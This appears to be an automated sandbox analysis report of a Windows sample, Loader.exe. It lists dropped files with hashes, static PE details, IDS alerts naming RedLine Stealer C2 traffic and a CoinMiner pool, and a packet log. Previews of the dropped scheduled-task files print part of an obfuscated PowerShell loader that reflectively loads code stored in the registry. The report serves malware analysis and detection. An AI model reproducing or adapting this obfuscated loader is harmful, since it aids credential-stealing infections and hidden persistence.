SSDEEP:	384:VteJGhuQZzj40JhXIISVZB2YAaWTCQTnfcy2D+Yb:9Bf4UTUf2YjWTCQL4b
MD5:	D18B63C3E733C1951EE59EE32CD2DB89
SHA1:	A76C2F1DE58870C75CA17751AE79B65B110560C6
SHA-256:	DB82932B98667756661A8A771EF2F60B45A6775E38F61D54043E10562B25A5B3
SHA-512:	B39B95CE6085E6CECD242FF27CE114FD27F4A8B88AB6C491D255F3A2AEF5D29D110A20F6918DC18BF0B285D25CC5C9494428FAE83E3A95491F1712976FAD75B7
Malicious:	false
Preview:	@...e...........0...............................................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\Tasks\dialersvc32.job

Download File

Process:	C:\Windows\System32\dialer.exe
File Type:	data
Category:	dropped
Size (bytes):	1416
Entropy (8bit):	3.742747254252116
Encrypted:	false
SSDEEP:	24:E8zK5tG3HPnyff86avRYYKaHYb6sCbaHKBlcwPN0+svOL:Eu/6ahTGC2rw
MD5:	02BD87491F5EB7B23D21362B30E8C288
SHA1:	6F6D3731EFF530D59BBF8D08E00B710EA423D4AB
SHA-256:	4F81CE7D6A53B5BF3957CD9FA95846A64A642A690EA6EBD59BE448C4E5F85E4E
SHA-512:	3912AA0C032E2401490B2A1D34CE367C464352377DEE4334DAB9F23296ACF1701EA2195879FEF7BBE49F5DF3BA097FC03D0DA312B1D4487C164FF72651D6B717
Malicious:	false
Preview:	.......)...K.w.....F.V.....<... .....s.................................p.o.w.e.r.s.h.e.l.l...-."...(.\.".{.1.}.{.0.}.\.". .-.f. .'.e.T.'.,.'.S.'.). . .(.\.".6.T.\.".+.\.".o.\.".). . .(.[.t.Y.p.E.].(.\.".{.2.}.{.0.}.{.4.}.{.1.}.{.3.}.\.". .-.F.'.e.'.,.'.m.B.L.'.,.'.r.e.f.l.'.,.'.y.'.,.'.c.t.i.O.n...A.s.S.e.'.). . .). . .;. .$.D.l.r.4.S. .=. . .[.t.y.P.e.].(.\.".{.3.}.{.1.}.{.2.}.{.4.}.{.0.}.\.".-.F.'.R.y.'.,.'.o.S.O.f.T...W.'.,.'.i.N.3.2...R.'.,.'.M.I.C.R.'.,.'.e.G.i.S.T.'.). . .;. . .$.6.T.O.:.:.(.\.".{.0.}.{.1.}.\.". .-.f. .'.L.'.,.'.o.a.d.'.)...I.n.v.o.k.e.(. . .(...(.\.".{.1.}.{.2.}.{.0.}.\.". .-.f. .'.t.-.I.t.e.m.'.,.'.g.'.,.'.e.'.). .(.\.".v.A.R.I.\.".+.\.".A.b.\.".+.\.".l.E.\.".+.\.".:.D.l.R.4.S.\.".). . .)...\.".V.A.`.l.u.E.\.".:.:.\.".l.O.c.`.A.L.M.`.A.C.h.i.n.e.\."...(.\.".{.2.}.{.1.}.{.0.}.\.". .-.f. .'.e.y.'.,.'.u.b.k.'.,.'.O.p.e.n.S.'.)...I.n.v.o.k.e.(.(.\.".{.1.}.{.0.}.\.".-.f.'.E.'.,.'.S.O.F.T.W.A.R.'.).)...(.\.".{.1.}.{.0.}.{.2.}.\.". .-.f.'.u.'.,.'.G.e.t.V.a.l.'.,.'.e.

C:\Windows\Tasks\dialersvc64.job

Download File

Process:	C:\Windows\System32\dialer.exe
File Type:	data
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	3.709909261190683
Encrypted:	false
SSDEEP:	24:xG8zK5tG3HPnyff86avRYYKaHYb6sCbaHKBlcwPNXL:xGu/6ahTGCR
MD5:	ABB32414DF8A2D2DFC1D3CD919AF5866
SHA1:	C943E0DD83B1D8C9E6D1750147F22D5A65293ECD
SHA-256:	B3473617F4E13735791DDCC7E6C7770DDAEA59C056C880E78A0C9B2F91348D46
SHA-512:	2D78712231FD9C05EF3E13DBE9FE6EC3E32CE9EE515000A6861D64F8E7CFB4D1E912222C0EA140019C6A0EB5649CD2021A1A83FF8148A578EF65486CB10CBADA
Malicious:	false
Preview:	..../.>..l.H.%}....wF.......<... .....s.................................p.o.w.e.r.s.h.e.l.l...-."...(.\.".{.1.}.{.0.}.\.". .-.f. .'.e.T.'.,.'.S.'.). . .(.\.".6.T.\.".+.\.".o.\.".). . .(.[.t.Y.p.E.].(.\.".{.2.}.{.0.}.{.4.}.{.1.}.{.3.}.\.". .-.F.'.e.'.,.'.m.B.L.'.,.'.r.e.f.l.'.,.'.y.'.,.'.c.t.i.O.n...A.s.S.e.'.). . .). . .;. .$.D.l.r.4.S. .=. . .[.t.y.P.e.].(.\.".{.3.}.{.1.}.{.2.}.{.4.}.{.0.}.\.".-.F.'.R.y.'.,.'.o.S.O.f.T...W.'.,.'.i.N.3.2...R.'.,.'.M.I.C.R.'.,.'.e.G.i.S.T.'.). . .;. . .$.6.T.O.:.:.(.\.".{.0.}.{.1.}.\.". .-.f. .'.L.'.,.'.o.a.d.'.)...I.n.v.o.k.e.(. . .(...(.\.".{.1.}.{.2.}.{.0.}.\.". .-.f. .'.t.-.I.t.e.m.'.,.'.g.'.,.'.e.'.). .(.\.".v.A.R.I.\.".+.\.".A.b.\.".+.\.".l.E.\.".+.\.".:.D.l.R.4.S.\.".). . .)...\.".V.A.`.l.u.E.\.".:.:.\.".l.O.c.`.A.L.M.`.A.C.h.i.n.e.\."...(.\.".{.2.}.{.1.}.{.0.}.\.". .-.f. .'.e.y.'.,.'.u.b.k.'.,.'.O.p.e.n.S.'.)...I.n.v.o.k.e.(.(.\.".{.1.}.{.0.}.\.".-.f.'.E.'.,.'.S.O.F.T.W.A.R.'.).)...(.\.".{.1.}.{.0.}.{.2.}.\.". .-.f.'.u.'.,.'.G.e.t.V.a.l.'.,.'.e.

C:\Windows\Temp\__PSScriptPolicyTest_hkmpsw2f.ac0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_i4uzyq5i.w3m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_n3lv2f22.rqr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_rshxfykc.uc1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\Loader.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	2.663532754804255
Encrypted:	false
SSDEEP:	3:gQdcXW:gQn
MD5:	5F702714045C206E93012159054928D0
SHA1:	3AEF30FD196AE230CD4C194006A3185524EFC82A
SHA-256:	A6706758CED31780EA9392DDDFE62CF54D9D03EED69FCCBB00234AF431892043
SHA-512:	AC25D23590C1907E726362F5C752022A0EC7F1D5E10B7A6CEB500CB6A685AACC2B5A8340EFB4AE0B30B186A17395BB7C682151F2389D765F1F890842B5884666
Malicious:	false
Preview:	76587687123

\Device\Null

Download File

Process:	C:\Windows\System32\schtasks.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	4.7056126559648375
Encrypted:	false
SSDEEP:	3:BgnKDOhocQhm3EKAK89AAAXb:BgnKqhD0eUK89o
MD5:	F04F1E8E8AB26775C738ACA256B5C1BB
SHA1:	19A83AAC7B6C8B6A0181AF00CB85EF409F3A3AF4
SHA-256:	F2069CFC235516AAFABB0CA7435779BBF52289F862661DB4FE139663442A383C
SHA-512:	EB643FC385D2F515CCF216D958B1B5DCE23A175134E29EC12292E2C4FDA33D8D106B9D5AB5151D28E9A31C2C8AF7787AEBBC76EFE3366238393A77DE09D9916F
Malicious:	false
Preview:	SUCCESS: The scheduled task "\ipNnOYSRDI" has successfully been created...

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.228634339633143
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Loader.exe
File size:	359424
MD5:	4e0323edbafa68173ea06b1ec8b95195
SHA1:	43e54fe6123884142cced786a64c5f26a5899593
SHA256:	0fddeb14acea742a808d10f5c6da7f411ea92e44f5e85b39cb8e9cf5e104a0ae
SHA512:	5e7eb7caa1bdc4914a693e0cfb620379b61d9885490b353eb29a46209eb6b082562934a6ac8caefbdeebb661f58788ec6d741d2ffc3276989b53f5599c6a40cf
SSDEEP:	6144:H4lqdSGPMJRAJLmEFw6T0w2BqCrAOaukgp16wxCW3QQYi0yMLwY5k64yoCfaN13:H2qdXPMJRAJLHCp7p3QQzYwY5k6uV3
TLSH:	7374BE217181C071DEE115353DF4E779857EF9610B648EEB67940F2A0F303E1AA72AAB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n............>...'...>.......>...<...x...;...x...>...x...a...>.../......v.......+.......+...Rich*...................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x409392
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6367BE50 [Sun Nov 6 14:01:52 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	00f742911a61c8d18b42b6d58979f845

Entrypoint Preview

Instruction
call 00007FCCC4A050D9h
jmp 00007FCCC4A04B89h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007FCCC4A04D2Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007FCCC4A04D1Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007FCCC4A04D1Eh
add edx, 28h
cmp edx, esi
jne 00007FCCC4A04CFCh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007FCCC4A04D0Bh
push esi
call 00007FCCC4A05585h
test eax, eax
je 00007FCCC4A04D32h
mov eax, dword ptr fs:[00000018h]
mov esi, 00457E34h
mov edx, dword ptr [eax+04h]
jmp 00007FCCC4A04D16h
cmp edx, eax
je 00007FCCC4A04D22h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007FCCC4A04D02h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007FCCC4A04D19h
mov byte ptr [00457E38h], 00000001h
call 00007FCCC4A05373h
call 00007FCCC4A075A7h
test al, al
jne 00007FCCC4A04D16h
xor al, al
pop ebp
ret
call 00007FCCC4A0F372h
test al, al
jne 00007FCCC4A04D1Ch
push 00000000h
call 00007FCCC4A075AEh
pop ecx
jmp 00007FCCC4A04CFBh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [00457E39h], 00000000h
je 00007FCCC4A04D16h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x330b4	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x59000	0x1c9c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3165c	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x31678	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x148	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x23392	0x23400	False	0.5776055518617021	data	6.667633030832068	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0xe816	0xea00	False	0.530715811965812	data	5.57954506605929	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x34000	0x24938	0x23c00	False	0.7960145323426573	data	7.458718227567174	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x59000	0x1c9c	0x1e00	False	0.736328125	data	6.4387212323105665	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

GetCurrentProcess, CreateThread, GetModuleHandleA, GetProcAddress, MultiByteToWideChar, FreeConsole, CreateFileW, HeapSize, GetProcessHeap, SetStdHandle, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, TerminateProcess, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, WriteConsoleW

USER32.dll

TranslateMessage, LoadIconA

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
79.137.204.112192.168.2.780497112850353 11/07/22-23:48:32.369814	TCP	2850353	ETPRO MALWARE Redline Stealer TCP CnC - Id1Response	80	49711	79.137.204.112	192.168.2.7
192.168.2.779.137.204.11249711802850286 11/07/22-23:49:11.408992	TCP	2850286	ETPRO TROJAN Redline Stealer TCP CnC Activity	49711	80	192.168.2.7	79.137.204.112
192.168.2.779.137.204.11249711802850027 11/07/22-23:48:30.299208	TCP	2850027	ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init	49711	80	192.168.2.7	79.137.204.112
192.168.2.78.8.8.857970532036289 11/07/22-23:50:41.139323	UDP	2036289	ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	57970	53	192.168.2.7	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2022 23:48:29.865726948 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:29.895133972 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:29.895260096 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:30.299207926 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:30.328593016 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:30.396230936 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:30.598968029 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:32.272363901 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:32.301964998 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:32.369813919 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:32.420754910 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:40.092865944 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:40.122294903 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:40.191665888 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:40.191703081 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:40.191720963 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:40.191739082 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:40.191755056 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:40.191793919 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:40.191859007 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.520314932 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.549716949 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.549740076 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.549751997 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.549763918 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.549776077 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.549789906 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.549798012 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.549798965 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.549810886 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.549885035 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.549937010 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.579139948 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579160929 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579174042 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579185963 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579196930 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579209089 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579229116 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.579318047 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.579335928 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579345942 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.579350948 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579363108 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579375029 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579391956 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.579508066 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.579530954 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.579607010 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.608561993 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608589888 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608618975 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608656883 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608670950 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608692884 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.608722925 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608737946 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608755112 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608756065 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.608767033 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608781099 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608787060 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.608849049 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608858109 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.608863115 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608875036 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608911991 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.608952999 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608964920 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608964920 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.608978987 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608985901 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608994961 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.608998060 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.609009027 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.609059095 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.609060049 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.609074116 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.609086990 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.609100103 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.609108925 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.609116077 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.609136105 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:47.609169960 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.609184027 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.609196901 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.609210014 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.610064030 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638071060 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638093948 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638107061 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638119936 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638149023 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638160944 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638241053 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638253927 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638355970 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638369083 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638434887 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638447046 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638562918 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638576031 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638587952 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638600111 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638641119 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638653040 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638664007 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638675928 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638686895 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638699055 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638710022 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:47.638721943 CET	80	49711	79.137.204.112	192.168.2.7
